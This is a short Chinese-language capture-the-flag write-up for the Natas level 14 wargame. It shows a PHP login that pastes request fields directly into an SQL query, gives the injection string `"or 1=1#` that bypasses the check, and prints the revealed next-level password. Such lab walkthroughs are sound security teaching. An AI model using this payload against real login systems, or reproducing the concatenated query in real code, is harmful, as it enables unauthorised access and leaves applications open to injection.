这一关需要我们输入用户名和密码来获取15关的密码,网页源代码如下
if(array_key_exists("username", $_REQUEST)) {
$link = mysql_connect(‘localhost‘, ‘natas14‘, ‘<censored>‘);
mysql_select_db(‘natas14‘, $link);
$query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
if(array_key_exists("debug", $_GET)) {
echo "Executing query: $query<br>";
}
if(mysql_num_rows(mysql_query($query, $link)) > 0) {
echo "Successful login! The password for natas15 is <censored><br>";
} else {
echo "Access denied!<br>";
}
mysql_close($link);
}
由于代码中直接将username和password进行拼接,我们可以考虑sql注入的方式绕过登录机制
username = "or 1=1#
password =
一个很简单的sql注入,拼接后的query为
select * from users where username="" or 1=1#
"#" 注释了之后的代码,因此密码就无关紧要了
Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
原文:https://www.cnblogs.com/wudiiv11/p/natas14.html